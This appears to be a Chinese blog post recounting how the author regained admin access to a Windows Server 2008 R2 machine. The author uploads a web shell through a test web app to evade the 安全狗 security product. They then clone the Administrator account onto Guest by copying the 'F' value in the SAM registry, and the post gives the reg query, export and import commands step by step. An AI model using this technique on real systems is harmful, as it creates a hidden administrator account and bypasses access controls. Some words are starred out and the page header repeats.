千家信息网

记一次克隆管理员的经历

发表于:2024-09-22 作者:千家信息网编辑
千家信息网最后更新 2024年09月22日,半夜Server 2008R2安装MS17-010补丁时,重启系统 发现系统密码忘记了还好本地登录的安全策略留了一个guest用户本地搭建了DVWA WEB***测试环境 权限为system通过漏洞上
千家信息网最后更新 2024年09月22日记一次克隆管理员的经历

半夜Server 2008R2安装MS17-010补丁时,重启系统 发现系统密码忘记了
还好本地登录的安全策略留了一个guest用户
本地搭建了DVWA WEB***测试环境 权限为system
通过漏洞上传过狗一句话***
***权限为system权限
可以创建用户 但是无法将用户添加至管理员组 估计是安全狗拦截了提权操作
随后将管理员权限克隆至login用户 登录成功

目标将把Guest提权为Administrator
查询SAM注册表下有什么配置文件
Reg query HKLM\SAM\SAM\Domains\Account\Users

查询用户名
Reg query HKLM\SAM\SAM\Domains\Account\Users\Names

000001F4的配置文件对应的用户为Administrator
000001F5的配置文件对应的用户为Guest
然后把注册表下的键值导出
先把Administrator的键值导出 保存到C盘名称为1.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1.reg
再把Guest的键值导出 保存到C盘名称为2.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F5 c:\2.reg

然后将1.reg "F"的键值数据复制下来 替换2.reg里面的"F"键值

然后在把2.reg导入到注册表
Reg import c:\2.reg
最后使用guest登录
用户家目录等 都变成了Administrator的数据
实际上就是Administrator=Guest

0